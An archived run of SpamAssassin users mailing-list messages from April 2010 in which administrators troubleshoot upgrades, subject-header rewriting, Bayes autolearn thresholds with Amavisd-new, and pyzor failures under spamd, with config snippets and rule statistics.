Re: spamd[18549]: config: failed to parse line, skipping, in /etc/mail/spamassassin/local.cf: use_auto_whitelist 1

2010-04-28 Thread C.M. Burns

ram schrieb:
 Hi
  
 i have recently update from 3.2.X to 3.3.X
  
 when i restart i get this message
  
 spamd[18549]: config: failed to parse line, skipping, in
 /etc/mail/spamassassin/local.cf http://local.cf: use_auto_whitelist 1
 any suggestions
  
 Ram

As far as I remember the AWL plugin is not loaded by default anymore.
You have to load the plugin in your config file.
I think this was mentioned in the update FAQ

bye
SK


Re: spamd[18549]: config: failed to parse line, skipping, in /etc/mail/spamassassin/local.cf: use_auto_whitelist 1

2010-04-28 Thread ram
Hi

thanks

but i rerun next time i have not seen that error
is that normal behaviour ?

Ram

On Wed, Apr 28, 2010 at 11:29 AM, C.M. Burns montibu...@googlemail.comwrote:


 ram schrieb:
  Hi
 
  i have recently update from 3.2.X to 3.3.X
 
  when i restart i get this message
 
  spamd[18549]: config: failed to parse line, skipping, in
  /etc/mail/spamassassin/local.cf http://local.cf: use_auto_whitelist
 1
  any suggestions
 
  Ram

 As far as I remember the AWL plugin is not loaded by default anymore.
 You have to load the plugin in your config file.
 I think this was mentioned in the update FAQ

 bye
 SK



Re: spamd[18549]: config: failed to parse line, skipping, in /etc/mail/spamassassin/local.cf: use_auto_whitelist 1

2010-04-28 Thread ram
after update also still it shows old version why ?

X-Spam-Status: No, score=-0.4 required=5.0 tests=AWL,BAYES_00,
 DATE_IN_PAST_03_06,HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,
 RCVD_IN_SORBS_WEB autolearn=no version=3.2.5



On Wed, Apr 28, 2010 at 11:36 AM, ram talk2...@gmail.com wrote:

 Hi

 thanks

 but i rerun next time i have not seen that error
 is that normal behaviour ?

 Ram

   On Wed, Apr 28, 2010 at 11:29 AM, C.M. Burns 
 montibu...@googlemail.comwrote:


 ram schrieb:
  Hi
 
  i have recently update from 3.2.X to 3.3.X
 
  when i restart i get this message
 
  spamd[18549]: config: failed to parse line, skipping, in
  /etc/mail/spamassassin/local.cf http://local.cf: use_auto_whitelist
 1
  any suggestions
 
  Ram

 As far as I remember the AWL plugin is not loaded by default anymore.
 You have to load the plugin in your config file.
 I think this was mentioned in the update FAQ

 bye
 SK





Re: Top Ten Rules

2010-04-28 Thread ram
On Fri, Apr 23, 2010 at 1:06 AM, Alex mysqlstud...@gmail.com wrote:

 Hi,

  How many entries? Does it just keep growing? We have a local one too,
  and every so often correlate it with the public RBLs so as to not
  duplicate the check and overhead.
 
  They expire in 2 weeks. They should make it into a public RBL by
  that time. Maybe it should even be shorter.

 I'm not sure that's the best approach. I can't say definitively, of
 course, but that seems very quick for them to automatically be
 expunged after two weeks.

 Do you have routines that query the blacklists periodically and remove
 the entries from your list based on the query result?

 I think that if you thought it was spam at one point, and even several
 months later it hasn't been listed on one of the public RBLs, then
 either submit it to them, or kat least keep it on your list or recheck
 it manually.

 Of course it depends on your workload, inherent benefit, etc...

  Sender address? Are you talking about protection from dictionary
  attacks, like a...@columbia.edu, b...@... etc?
 
  If the sender claims to be a...@columbia.edu, then we can verify whether
  the localpart aaa exists. Our own domain is the only one for which we
  can check localpart, of course. If it does not exist, goodbye.

 Ah, that's a different matter. That's an easy one that we all do too.

  Joseph Brennan
  Columbia University Information Technology

 It would be very cool to work at Columbia :-)

 Regards,
 Alex




my stats show new server like this ( sitewide spamassassin)

is the spamassassin configured in good way. ?

or any suggestions


./sa-stats

Email: 3347  Autolearn:  1422  AvgScore:   1.44  AvgScanTime:  8.03 sec
Spam:   689  Autolearn:   287  AvgScore:  11.72  AvgScanTime:  8.16 sec
Ham:   2658  Autolearn:  1135  AvgScore:  -1.23  AvgScanTime:  8.00 sec
Time Spent Running SA: 7.47 hours
Time Spent Processing Spam:1.56 hours
Time Spent Processing Ham: 5.90 hours
TOP SPAM RULES FIRED
--
RANKRULE NAME   COUNT  %OFMAIL %OFSPAM  %OFHAM
--
   1HTML_MESSAGE  45569.82   66.04   70.81
   2RAZOR2_CHECK  40915.72   59.364.40
   3RAZOR2_CF_RANGE_51_10038914.40   56.463.50
   4BAYES_99  35710.67   51.810.00
   5RAZOR2_CF_RANGE_E4_51_100 259 8.25   37.590.64
   6AWL   25167.85   36.43   76.00
   7RAZOR2_CF_RANGE_E8_51_100 230 9.17   33.382.90
   8PYZOR_CHECK   223 7.59   32.371.17
   9MIME_HTML_ONLY22022.74   31.93   20.35
  10URIBL_BLACK   208 7.92   30.192.14
  11DIGEST_MULTIPLE   200 6.01   29.030.04
  12URIBL_JP_SURBL172 5.32   24.960.23
  13BAYES_50  157 7.80   22.793.91
  14RDNS_NONE 148 9.59   21.486.51
  15SUBJ_ALL_CAPS 147 7.38   21.343.76
  16FORGED_MUA_OUTLOOK129 4.51   18.720.83
  17MISSING_HEADERS   129 5.08   18.721.54
  18RCVD_IN_SORBS_WEB 126 8.37   18.295.79
  19URIBL_WS_SURBL124 3.79   18.000.11
  20HTML_MIME_NO_HTML_TAG 121 7.83   17.565.30
--
TOP HAM RULES FIRED
--
RANKRULE NAME   COUNT  %OFMAIL %OFSPAM  %OFHAM
--
   1BAYES_00 249175.836.82   93.72
   2AWL  202067.85   36.43   76.00
   3HTML_MESSAGE 188269.82   66.04   70.81
   4SPF_HELO_PASS 57717.903.19   21.71
   5MIME_HTML_ONLY54122.74   31.93   20.35
   6DEAR_SOMETHING276 9.084.06   10.38
   7RCVD_IN_DNSWL_MED 195 5.920.447.34
   8MISSING_MID   192 8.93   15.537.22
   9RDNS_NONE 173 9.59   21.486.51
  10RCVD_IN_SORBS_WEB 154 8.37   18.295.79
  11HTML_MIME_NO_HTML_TAG 141 7.83   17.565.30
  12RCVD_IN_DNSWL_LOW 119 6.30   13.354.48
  13RAZOR2_CHECK  11715.72   59.364.40
  14MIME_QP_LONG_LINE 110 4.063.774.14
  15BAYES_50  104 7.80   22.79

Re: spamd[18549]: config: failed to parse line, skipping, in /etc/mail/spamassassin/local.cf: use_auto_whitelist 1

2010-04-28 Thread Jari Fredriksson
On 28.4.2010 9:10, ram wrote:
 after update also still it shows old version why ?
  
 X-Spam-Status: No, score=-0.4 required=5.0 tests=AWL,BAYES_00,
  DATE_IN_PAST_03_06,HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,
  RCVD_IN_SORBS_WEB autolearn=no version=3.2.5
 

Maybe you used to use the distro packaked version /usr/sbin/spamd and
now you compiled from source or from CPAN: /usr/local/bin/spamd

The /etc/init.d/spamassassin or such must be changed to start the
correct version.



-- 
http://www.iki.fi/jarif/

There is no hunting like the hunting of man, and those who have hunted
armed men long enough and liked it, never care for anything else thereafter.
-- Ernest Hemingway



signature.asc
Description: OpenPGP digital signature


Re: Spamassassin rewriting headers of messages that are not marked Spam

2010-04-28 Thread Sitapati

Thanks for your reply Alex!


Alex-325 wrote:
 
 Hi,
 
 My spamassassin installation suddenly (since March) starting rewriting
 the
 headers of messages that are not spam.
 
 March isn't so suddenly. Why is it a problem now and not last month?
 
I'm tolerant. However, my tolerance has limits, and I've reached them.

Alex-325 wrote:
 
 Are you sure it is your system that is rewriting the headers? Is it
 happening on every email?
 
It's happening on 90%, and I'm not able to discern the pattern of the other
10%. Yes I'm sure it's my system, because the header shows xspam-prev-header
without [SPAM] in it. That means that spamassassin admits that it changed
the header and added [SPAM] to it.

Alex-325 wrote:
 
 X-Spam-Status: No, score=3.9 required=5.0 tests=AWL,BAYES_50,
 DNS_FROM_OPENWHOIS,FH_DATE_PAST_20XX,HTML_MESSAGE,URG_BIZ autolearn=no
 
 That says that it isn't spam, so it doesn't seem likely that your
 system would be rewriting the subject header to say that it's spam.
 
It seems that my system shouldn't be doing it,  but it is, which is the
problem.

Alex-325 wrote:
 
 What setting do you have in local.cf for reporting? Check these
 variables:
 
 report_safe
 clear_report_template
 report
 add_header all
 
This is the entire content of my local.cf:

required_hits 5
report_safe 0
rewrite_header Subject [SPAM]


-- 
View this message in context: 
http://old.nabble.com/Spamassassin-rewriting-headers-of-messages-that-are-not-marked-Spam-tp28384319p28385386.html
Sent from the SpamAssassin - Users mailing list archive at Nabble.com.



Re: Spamassassin rewriting headers of messages that are not marked Spam

2010-04-28 Thread Arthur Dent
On Tue, 2010-04-27 at 23:53 -0700, Sitapati wrote:
 Thanks for your reply Alex!
 
 
 Alex-325 wrote:
  
  Hi,
  
  My spamassassin installation suddenly (since March) starting rewriting
  the
  headers of messages that are not spam.
  
  March isn't so suddenly. Why is it a problem now and not last month?
  
 I'm tolerant. However, my tolerance has limits, and I've reached them.
 
 Alex-325 wrote:
  
  Are you sure it is your system that is rewriting the headers? Is it
  happening on every email?
  
 It's happening on 90%, and I'm not able to discern the pattern of the other
 10%. Yes I'm sure it's my system, because the header shows xspam-prev-header
 without [SPAM] in it. That means that spamassassin admits that it changed
 the header and added [SPAM] to it.
 
 Alex-325 wrote:
  
  X-Spam-Status: No, score=3.9 required=5.0 tests=AWL,BAYES_50,
  DNS_FROM_OPENWHOIS,FH_DATE_PAST_20XX,HTML_MESSAGE,URG_BIZ autolearn=no
  
  That says that it isn't spam, so it doesn't seem likely that your
  system would be rewriting the subject header to say that it's spam.
  
 It seems that my system shouldn't be doing it,  but it is, which is the
 problem.
 
 Alex-325 wrote:
  
  What setting do you have in local.cf for reporting? Check these
  variables:
  
  report_safe
  clear_report_template
  report
  add_header all
  
 This is the entire content of my local.cf:
 
 required_hits 5
 report_safe 0
 rewrite_header Subject [SPAM]

Just to be sure it *is* your SA installation that's writing this, try
changing that (temporarily) to something like: 

rewrite_header Subject [SPAM Test]

and see if it really is your SA doing the re-write. Don't forget to
restart spamd.




signature.asc
Description: This is a digitally signed message part


Re: spamd[18549]: config: failed to parse line, skipping, in /etc/mail/spamassassin/local.cf: use_auto_whitelist 1

2010-04-28 Thread ram
both installed from rpm

Ram

On Wed, Apr 28, 2010 at 12:14 PM, Jari Fredriksson ja...@iki.fi wrote:

 On 28.4.2010 9:10, ram wrote:
  after update also still it shows old version why ?
 
  X-Spam-Status: No, score=-0.4 required=5.0 tests=AWL,BAYES_00,
   DATE_IN_PAST_03_06,HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,
   RCVD_IN_SORBS_WEB autolearn=no version=3.2.5
 

 Maybe you used to use the distro packaked version /usr/sbin/spamd and
 now you compiled from source or from CPAN: /usr/local/bin/spamd

 The /etc/init.d/spamassassin or such must be changed to start the
 correct version.



 --
 http://www.iki.fi/jarif/

 There is no hunting like the hunting of man, and those who have hunted
 armed men long enough and liked it, never care for anything else
 thereafter.
-- Ernest Hemingway




Re: spamd[18549]: config: failed to parse line, skipping, in /etc/mail/spamassassin/local.cf: use_auto_whitelist 1

2010-04-28 Thread ram
/usr/bin/spamd  -V
SpamAssassin Server version 3.3.1
  running on Perl 5.8.8
  with SSL support (IO::Socket::SSL 1.01)
  with zlib support (Compress::Zlib 1.42)


On Wed, Apr 28, 2010 at 12:14 PM, Jari Fredriksson ja...@iki.fi wrote:

 On 28.4.2010 9:10, ram wrote:
  after update also still it shows old version why ?
 
  X-Spam-Status: No, score=-0.4 required=5.0 tests=AWL,BAYES_00,
   DATE_IN_PAST_03_06,HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,
   RCVD_IN_SORBS_WEB autolearn=no version=3.2.5
 

 Maybe you used to use the distro packaked version /usr/sbin/spamd and
 now you compiled from source or from CPAN: /usr/local/bin/spamd

 The /etc/init.d/spamassassin or such must be changed to start the
 correct version.



 --
 http://www.iki.fi/jarif/

 There is no hunting like the hunting of man, and those who have hunted
 armed men long enough and liked it, never care for anything else
 thereafter.
-- Ernest Hemingway




Re: spamd[18549]: config: failed to parse line, skipping, in /etc/mail/spamassassin/local.cf: use_auto_whitelist 1

2010-04-28 Thread Bowie Bailey
ram wrote:
 /usr/bin/spamd  -V
 SpamAssassin Server version 3.3.1
   running on Perl 5.8.8
   with SSL support (IO::Socket::SSL 1.01)
   with zlib support (Compress::Zlib 1.42)


 On Wed, Apr 28, 2010 at 12:14 PM, Jari Fredriksson ja...@iki.fi
 mailto:ja...@iki.fi wrote:

 On 28.4.2010 9:10, ram wrote:
  after update also still it shows old version why ?
 
  X-Spam-Status: No, score=-0.4 required=5.0 tests=AWL,BAYES_00,
 
  DATE_IN_PAST_03_06,HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,
   RCVD_IN_SORBS_WEB autolearn=no version=3.2.5
 

 Maybe you used to use the distro packaked version /usr/sbin/spamd and
 now you compiled from source or from CPAN: /usr/local/bin/spamd

 The /etc/init.d/spamassassin or such must be changed to start the
 correct version.


Then that is obviously not the version that is running.  Restart spamd
and then look in your maillog for a line like this:

Apr 28 11:29:00 bnofmail spamd[31983]: spamd: server started on port
783/tcp (running version 3.3.1)

If it doesn't say 3.3.1, then you have two spamd's installed and you
need to track down the old one and get rid of it.

-- 
Bowie


Auto Learn Spam

2010-04-28 Thread Carlos Mennens
I noticed when reviewing headers today that there was a section for
'autolearn=no' and was wondering what exactly does this mean and
wouldn't autolearn be a good thing? I use Amavisd-new which calls out
to SpamAssassin modules but I don't have the spamd daemon running
physically. The Amavisd-new daemon simply loads the modules for spamd
and does the scoring directly saving my mail server from running more
daemon's and system resources that it needs to. So below are the
headers:

X-Spam-Status: No, score=2.808 tagged_above=-999 required=5
tests=[BAYES_50=0.8, HTML_IMAGE_ONLY_24=1.618, HTML_MESSAGE=0.001,
HTML_MIME_NO_HTML_TAG=0.377, MIME_HTML_ONLY=0.723,
RCVD_IN_DNSWL_LOW=-0.7, SPF_PASS=-0.001, T_RP_MATCHES_RCVD=-0.01]
autolearn=no

The last line is what I am confused about.

-Carlos


Re: Auto Learn Spam

2010-04-28 Thread Michael Scheidell



On 4/28/10 11:53 AM, Carlos Mennens wrote:

I noticed when reviewing headers today that there was a section for
'autolearn=no'

its a SPAMASSASSIN thing. (google)
it means the score was either not high enough for SA to learn as spam 
(bayes, and/or AWL) or was not low enough to learn as ham.


you should set the triggers high and low enough so that you don't 
accidentally learn a sneaky spam as ham, etc.


--
Michael Scheidell, CTO
Phone: 561-999-5000, x 1259
 *| *SECNAP Network Security Corporation

   * Certified SNORT Integrator
   * 2008-9 Hot Company Award Winner, World Executive Alliance
   * Five-Star Partner Program 2009, VARBusiness
   * Best Anti-Spam Product 2008, Network Products Guide
   * King of Spam Filters, SC Magazine 2008

__
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/
__  


Re: Auto Learn Spam

2010-04-28 Thread Dennis B. Hopp

On Wed, 2010-04-28 at 11:53 -0400, Carlos Mennens wrote:
 I noticed when reviewing headers today that there was a section for
 'autolearn=no' and was wondering what exactly does this mean and
 wouldn't autolearn be a good thing? I use Amavisd-new which calls out
 to SpamAssassin modules but I don't have the spamd daemon running
 physically. The Amavisd-new daemon simply loads the modules for spamd
 and does the scoring directly saving my mail server from running more
 daemon's and system resources that it needs to. So below are the
 headers:
 

Autolearn kicks in at certain scores.  I believe the default is 12.0 for
spam and 0.1 for ham.  You can customize those settings in your local.cf
file.

bayes_auto_learn 1
bayes_auto_learn_threshold_nonspam -3.0
bayes_auto_learn_threshold_spam 12.0

I changed the default value for nonspam because the majority of my users
don't train bayes and so the default value could cause bayes to learn
incorrectly if a spam message scored low (maybe no network rules or URI
rules triggered the first few times).

 X-Spam-Status: No, score=2.808 tagged_above=-999 required=5
 tests=[BAYES_50=0.8, HTML_IMAGE_ONLY_24=1.618, HTML_MESSAGE=0.001,
 HTML_MIME_NO_HTML_TAG=0.377, MIME_HTML_ONLY=0.723,
 RCVD_IN_DNSWL_LOW=-0.7, SPF_PASS=-0.001, T_RP_MATCHES_RCVD=-0.01]
 autolearn=no
 

This particular message scored a 2.808 so it's not high or low enough
for bayes to know which way it should learn the message.

--Dennis



Re: spamd[18549]: config: failed to parse line, skipping, in /etc/mail/spamassassin/local.cf: use_auto_whitelist 1

2010-04-28 Thread Benny Pedersen

On ons 28 apr 2010 08:10:49 CEST, ram wrote


after update also still it shows old version why ?


make sure its not installed so

possible you have 2 perl versions, 2 spamassassin versions installed

only you can see it

--
xpoint http://www.unicom.com/pw/reply-to-harmful.html



Re: Auto Learn Spam

2010-04-28 Thread Carlos Mennens
On Wed, Apr 28, 2010 at 12:10 PM, Dennis B. Hopp dh...@coreps.com wrote:
 Autolearn kicks in at certain scores.  I believe the default is 12.0 for
 spam and 0.1 for ham.  You can customize those settings in your local.cf
 file.

 bayes_auto_learn 1
 bayes_auto_learn_threshold_nonspam -3.0
 bayes_auto_learn_threshold_spam 12.0

I checked /etc/mail/spamassassin/local.cf just now and found only the following:

required_hits 5
report_safe 0
rewrite_header Subject [SPAM]

However I don't know if Amavisd-new is looking at local.cf because I
show parameters in my amavisd.conf file for SpamAssassin:

$sa_tag_level_deflt  = -999.0;  # add spam info headers if at, or
above that level
$sa_tag2_level_deflt = 5.0; # add 'spam detected' headers at that level
$sa_kill_level_deflt = 8.0; # triggers spam evasive actions (e.g.
blocks mail)
$sa_dsn_cutoff_level = 10;  # spam level beyond which a DSN is not sent
$sa_quarantine_cutoff_level = 12; # spam level beyond which quarantine is off
$penpals_bonus_score = 8;# (no effect without a @storage_sql_dsn database)
$penpals_threshold_high = $sa_kill_level_deflt;  # don't waste time on hi spam

$sa_mail_body_size_limit = 400*1024; # don't waste time on SA if mail is larger
$sa_local_tests_only = 0;# only tests which do not require internet access?
[...]
$sa_spam_subject_tag = '***SPAM*** ';
$defang_virus  = 1;  # MIME-wrap passed infected mail
$defang_banned = 1;  # MIME-wrap passed mail containing banned name
# for defanging bad headers only turn on certain minor contents categories:
$defang_by_ccat{+CC_BADH.,3} = 1;  # NUL or CR character in header
$defang_by_ccat{+CC_BADH.,5} = 1;  # header line longer than 998 characters

When I get a spam message that was scored by SA, it says ***SPAM***
and not [SPAM] so that leaves me to believe that SA parameters are
being fed from amavisd.conf file. Does this make sense to you guys?



 I changed the default value for nonspam because the majority of my users
 don't train bayes and so the default value could cause bayes to learn
 incorrectly if a spam message scored low (maybe no network rules or URI
 rules triggered the first few times).

 X-Spam-Status: No, score=2.808 tagged_above=-999 required=5
     tests=[BAYES_50=0.8, HTML_IMAGE_ONLY_24=1.618, HTML_MESSAGE=0.001,
     HTML_MIME_NO_HTML_TAG=0.377, MIME_HTML_ONLY=0.723,
     RCVD_IN_DNSWL_LOW=-0.7, SPF_PASS=-0.001, T_RP_MATCHES_RCVD=-0.01]
     autolearn=no


 This particular message scored a 2.808 so it's not high or low enough
 for bayes to know which way it should learn the message.

 --Dennis




Re: spamd[18549]: config: failed to parse line, skipping, in /etc/mail/spamassassin/local.cf: use_auto_whitelist 1

2010-04-28 Thread Benny Pedersen

On ons 28 apr 2010 10:54:38 CEST, ram wrote


both installed from rpm


so you really have both installed at once ?

--
xpoint http://www.unicom.com/pw/reply-to-harmful.html



Re: spamd[18549]: config: failed to parse line, skipping, in /etc/mail/spamassassin/local.cf: use_auto_whitelist 1

2010-04-28 Thread Benny Pedersen

On ons 28 apr 2010 10:55:10 CEST, ram wrote


/usr/bin/spamd  -V
SpamAssassin Server version 3.3.1
  running on Perl 5.8.8
  with SSL support (IO::Socket::SSL 1.01)
  with zlib support (Compress::Zlib 1.42)


spamassassin 21 -D --lint | less

see what gets loaded where

--
xpoint http://www.unicom.com/pw/reply-to-harmful.html



How many Froms?

2010-04-28 Thread Charles Gregory

Hiyo!

Occasionally I see an e-mail with multiple addresses on the 'From:' 
header. (not the envelope)


Can anyone think of legitimate uses for multiple From: addresses?
Or could I just use a rule like:

header From =~ /\...@.*\@/

- C


Re: Auto Learn Spam

2010-04-28 Thread Dennis B. Hopp

On Wed, 2010-04-28 at 12:38 -0400, Carlos Mennens wrote:

 I checked /etc/mail/spamassassin/local.cf just now and found only the 
 following:
 
 required_hits 5
 report_safe 0
 rewrite_header Subject [SPAM]
 
 However I don't know if Amavisd-new is looking at local.cf because I
 show parameters in my amavisd.conf file for SpamAssassin:
 
 $sa_tag_level_deflt  = -999.0;  # add spam info headers if at, or
 above that level
 $sa_tag2_level_deflt = 5.0; # add 'spam detected' headers at that level
 $sa_kill_level_deflt = 8.0; # triggers spam evasive actions (e.g.
 blocks mail)
 $sa_dsn_cutoff_level = 10;  # spam level beyond which a DSN is not sent
 $sa_quarantine_cutoff_level = 12; # spam level beyond which quarantine is off
 $penpals_bonus_score = 8;# (no effect without a @storage_sql_dsn database)
 $penpals_threshold_high = $sa_kill_level_deflt;  # don't waste time on hi spam
 

These settings are for amavisd-new and not spamassassin.  Amavisd-new is
the glue between your MTA and spamassassin (and virus scanners).  Most
of the behavior of spamassassin is still controlled through the local.cf
(although some settings can be defined in both places and the
amavisd.conf file will take precedence).

 $sa_mail_body_size_limit = 400*1024; # don't waste time on SA if mail is 
 larger
 $sa_local_tests_only = 0;# only tests which do not require internet 
 access?
 [...]
 $sa_spam_subject_tag = '***SPAM*** ';
 $defang_virus  = 1;  # MIME-wrap passed infected mail
 $defang_banned = 1;  # MIME-wrap passed mail containing banned name
 # for defanging bad headers only turn on certain minor contents categories:
 $defang_by_ccat{+CC_BADH.,3} = 1;  # NUL or CR character in header
 $defang_by_ccat{+CC_BADH.,5} = 1;  # header line longer than 998 characters
 
 When I get a spam message that was scored by SA, it says ***SPAM***
 and not [SPAM] so that leaves me to believe that SA parameters are
 being fed from amavisd.conf file. Does this make sense to you guys?

This is just the setting in amavisd.conf taking precedence.  If you were
to comment out $sa_spam_subject_tag I *believe* the value in your
local.cf would then be used.




Re: Auto Learn Spam

2010-04-28 Thread Bowie Bailey
Carlos Mennens wrote:
 On Wed, Apr 28, 2010 at 12:10 PM, Dennis B. Hopp dh...@coreps.com wrote:
   
 Autolearn kicks in at certain scores.  I believe the default is 12.0 for
 spam and 0.1 for ham.  You can customize those settings in your local.cf
 file.

 bayes_auto_learn 1
 bayes_auto_learn_threshold_nonspam -3.0
 bayes_auto_learn_threshold_spam 12.0
 

 I checked /etc/mail/spamassassin/local.cf just now and found only the 
 following:

 required_hits 5
 report_safe 0
 rewrite_header Subject [SPAM]

 However I don't know if Amavisd-new is looking at local.cf because I
 show parameters in my amavisd.conf file for SpamAssassin:

 $sa_tag_level_deflt  = -999.0;  # add spam info headers if at, or
 above that level
 $sa_tag2_level_deflt = 5.0; # add 'spam detected' headers at that level
 $sa_kill_level_deflt = 8.0; # triggers spam evasive actions (e.g.
 blocks mail)
 $sa_dsn_cutoff_level = 10;  # spam level beyond which a DSN is not sent
 $sa_quarantine_cutoff_level = 12; # spam level beyond which quarantine is off
 $penpals_bonus_score = 8;# (no effect without a @storage_sql_dsn database)
 $penpals_threshold_high = $sa_kill_level_deflt;  # don't waste time on hi spam

 $sa_mail_body_size_limit = 400*1024; # don't waste time on SA if mail is 
 larger
 $sa_local_tests_only = 0;# only tests which do not require internet 
 access?
 [...]
 $sa_spam_subject_tag = '***SPAM*** ';
 $defang_virus  = 1;  # MIME-wrap passed infected mail
 $defang_banned = 1;  # MIME-wrap passed mail containing banned name
 # for defanging bad headers only turn on certain minor contents categories:
 $defang_by_ccat{+CC_BADH.,3} = 1;  # NUL or CR character in header
 $defang_by_ccat{+CC_BADH.,5} = 1;  # header line longer than 998 characters

 When I get a spam message that was scored by SA, it says ***SPAM***
 and not [SPAM] so that leaves me to believe that SA parameters are
 being fed from amavisd.conf file. Does this make sense to you guys?

There are a few differences when you run SA through Amavis:

1) Required scores for tagging or rejecting messages are set in the
Amavis config (SA settings are ignored)
2) Settings for adding headers/markup to the email are set via Amavis
3) amavisd loads the SA libraries internally, so it is not necessary to
run spamd.

So your required_hits, report_safe, and rewrite_header options will not
be used by amavis.

However, the bayes settings along with rules, scores, etc, ARE read from
the normal SA configs, so if you want to change the Bayes learning
behavior, you can add the settings given above to your local.cf file and
then restart amavisd.  Keep in mind that the settings shown above are
more conservative than the default, so it will result in fewer messages
being learned automatically, but it is less likely to learn messages
incorrectly (spam being learned as ham or ham being learned as spam).

-- 
Bowie


Problem with pyzor and Spamassassin (in Postfix)

2010-04-28 Thread Sebastian Kösters

Hi,

i am using pyzor-0.4.0-11.el5 on CentOS 5 with spamassassin-3.3.1-3.

Spamassassin works fine in postfix, but pyzor does not.

maillog:

[...]
Apr 28 15:10:43 mail spamd[19721]: pyzor: opening pipe: /usr/bin/pyzor 
--homedir /var/vmail/.pyzor check  /tmp/.spamassassin19721QlsZUItmp

Apr 28 15:10:43 mail spamd[19760]: util: setuid: ruid=5000 euid=5000
Apr 28 15:10:43 mail spamd[19721]: pyzor: [19760] finished: exit 1
Apr 28 15:10:43 mail spamd[19721]: pyzor: got response: 
public.pyzor.org:24441 (200, 'OK') 0 0

[...]

pyzor always quits with exit 1.

i then activated the debug mode (-d).

maillog:

Apr 28 18:10:23 mail spamd[5754]: pyzor: opening pipe: /usr/bin/pyzor -d 
--homedir /var/vmail/.pyzor check  /tmp/.spamassassin57546sMuqLtmp

Apr 28 18:10:23 mail spamd[5819]: util: setuid: ruid=5000 euid=5000
Apr 28 18:10:23 mail spamd[5754]: pyzor: [5819] finished: exit 1
Apr 28 18:10:23 mail spamd[5754]: pyzor: got response: sending: 'User: 
anonymous\nTime: 1272471023\nSig: 
16a37f696e317cfd4dea8323fdf93ba645b4be32\n\nOp: check\nOp-Digest: 
da5fba2e21653a9de1187a39bc0426b898de5c03\nThread: 37970\nPV: 
2.0\n\n'\nreceived: 'Thread: 37970\nCount: 0\nWL-Count: 0\nCode: 
200\nDiag: OK\nPV: 2.0\n\n'\npublic.pyzor.org:24441 (200, 'OK') 0 0

Apr 28 18:10:23 mail spamd[5754]: dns: leaving helper-app run mode
Apr 28 18:10:23 mail spamd[5754]: pyzor: failure to parse response 
sending: 'User: anonymous\nTime: 1272471023\nSig: 
16a37f696e317cfd4dea8323fdf93ba645b4be32\n\nOp: check\nOp-Digest: 
da5fba2e21653a9de1187a39bc0426b898de5c03\nThread: 37970\nPV: 2.0\n\n'
Apr 28 18:10:23 mail spamd[5754]: pyzor: failure to parse response 
received: 'Thread: 37970\nCount: 0\nWL-Count: 0\nCode: 200\nDiag: 
OK\nPV: 2.0\n\n'



this does not help me :-/

When i test spamassassin and pyzor from console everything works fine:


su - vmail -c spamassassin -D  /var/vmail/sample-spam.txt


Apr 28 15:37:34.368 [26581] dbg: pyzor: opening pipe: /usr/bin/pyzor 
--homedir /var/vmail/.pyzor check  /tmp/.spamassassin26581NSj6S4tmp

Apr 28 15:37:34.374 [26582] dbg: util: setuid: ruid=5000 euid=5000
Apr 28 15:37:34.418 [26581] dbg: pyzor: [26582] finished successfully
Apr 28 15:37:34.418 [26581] dbg: pyzor: got response: 
public.pyzor.org:24441 (200, 'OK') 183 0


pyzor with debug on:

su - vmail -c /usr/bin/pyzor -d --homedir /var/vmail/.pyzor check  
/var/vmail/sample-spam.txt



sending: 'User: anonymous\nTime: 1272474781\nSig: 
f60b585c499d9ac86cd9ecdc29d58c467cf102cc\n\nOp: check\nOp-Digest: 
d152948f7f029b35691afa499c145797558b2fff\nThread: 59481\nPV: 2.0\n\n'
received: 'Thread: 59481\nCount: 183\nWL-Count: 0\nCode: 200\nDiag: 
OK\nPV: 2.0\n\n'

public.pyzor.org:24441  (200, 'OK') 183 0


my local.cf:

---
# These values can be overridden by editing ~/.spamassassin/user_prefs.cf
# (see spamassassin(1) for details)

# These should be safe assumptions and allow for simple visual sifting
# without risking lost emails.

required_hits 5
required_score 2.0
report_safe 1
rewrite_header Subject  [* SPAM _SCORE_ *]
add_header all Status _YESNO_, score=_SCORE_ required=_REQD_ 
tests=_TESTSSCORES(,)_ _PYZOR_ _RBL_ autolearn=_AUTOLEARN_ version=_VERSION_


# Enable the Bayes system
use_bayes 1
use_bayes_rules 1
bayes_path /var/vmail/.spamassassin/bayes
# Enable Bayes auto-learning
bayes_auto_learn 1

# Enable or disable network checks
skip_rbl_checks 0

use_razor2 1
razor_config /var/vmail/.razor/razor-agent.conf
razor_timeout 10

use_pyzor 1
pyzor_path /usr/bin/pyzor
pyzor_options --homedir /var/vmail/.pyzor
pyzor_max 15
pyzor_timeout 15

#bayes punkte
score BAYES_00 -6.1
score BAYES_01 -5.0
score BAYES_10 -3.5
score BAYES_20 -2.0
score BAYES_30 -1.0
score BAYES_40 -0.3
score BAYES_44 -0.01
score BAYES_50 0.01
score BAYES_56 0.3
score BAYES_60 1.0
score BAYES_70 1.6
score BAYES_80 3.1
score BAYES_90 5.2
score BAYES_99 7.2

#razor punkte
score RAZOR2_CHECK 1.8
score RAZOR2_CF_RANGE_11_50 0.32
score RAZOR2_CF_RANGE_51_100 2.7

#pyzor punkte
score PYZOR_CHECK 4.8

#sonstige punkte
score SUBJ_ILLEGAL_CHARS 2.6
score PORN_4 3.7
score RCVD_IN_RFCI 2.0
score RCVD_IN_ORBS 1.0
score RCVD_IN_DSBL 1.0
score RCVD_IN_SBL 0.5
score RCVD_IN_VISI 1.0
score RCVD_IN_RFCI 0.5
score RCVD_IN_SORBS 0.5
score X_NJABL_OPEN_PROXY 0.5
score RCVD_IN_UNCONFIRMED_DSBL 0.2
score RCVD_IN_BL_SPAMCOP_NET 1.1
score RCVD_IN_VISI 0.3
score RCVD_IN_RELAYS_ORDB_ORG 0.3
score USER_AGENT_MACOE 1.0
score NIGERIAN_TRANSACTION_1 1.5
score MICROSOFT_EXECUTABLE 3.100
score MIME_SUSPECT_NAME 3.100
score RCVD_IN_BONDEDSENDER -6.0
score HABEAS_HIL_RBL -6.0
score X_LIST_UNSUBSCRIBE 0.5
score EMAIL_ATTRIBUTION -0.5
score IN_REP_TO -0.5
score QUOTED_EMAIL_TEXT -0.5
score REPLY_WITH_QUOTES -0.5
